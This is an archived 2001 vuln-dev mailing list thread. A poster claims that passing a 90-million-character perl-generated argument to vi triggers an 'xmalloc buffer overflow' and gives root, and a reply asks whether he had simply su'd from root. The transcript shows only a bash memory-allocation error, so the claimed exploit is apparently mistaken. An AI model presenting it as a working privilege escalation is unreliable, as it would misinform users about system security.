Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

RE: xmalloc buffer overflow?

From: Gonzalez Albert <albert.gonzalez () siemens com>
Date: Fri, 9 Nov 2001 14:05:55 -0500 
Did you su to the nobody user from the root account?

-----Original Message-----
From: Robert Freeman [mailto:freem100 () chapman edu]
Sent: Thursday, November 09, 2000 7:52 AM
To: vuln-dev () security-focus com
Subject: xmalloc buffer overflow?


Can anybody else verify these results? It doesn't matter what `perl -e
'print "." x 90000000'` is appended to, I just chose vi (the vi buffer
overflow being my inspiration). Please use the exploit responsibly; also if
it is redundant, I apologize.


# uname -a
Linux linux 2.4.4-4GB #1 Fri May 18 14:11:12 GMT 2001 i686 unknown  [I know
about the clock...]
# id
uid=500(nobody) gid=100(users) groups=100(users)
# vi `perl -e 'print "." x 90000000'`
bash: xmalloc: cannot allocate 90000001 bytes (0 bytes allocated)
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),65534(nogrou
p)


Robert Freeman

----------------------------------------------------
Sign Up for NetZero Platinum Today
Only $9.95 per month!
http://my.netzero.net/s/signup?r=platinum&refcd=PT97
Previous By Date Next
Previous By Thread Next

Current thread: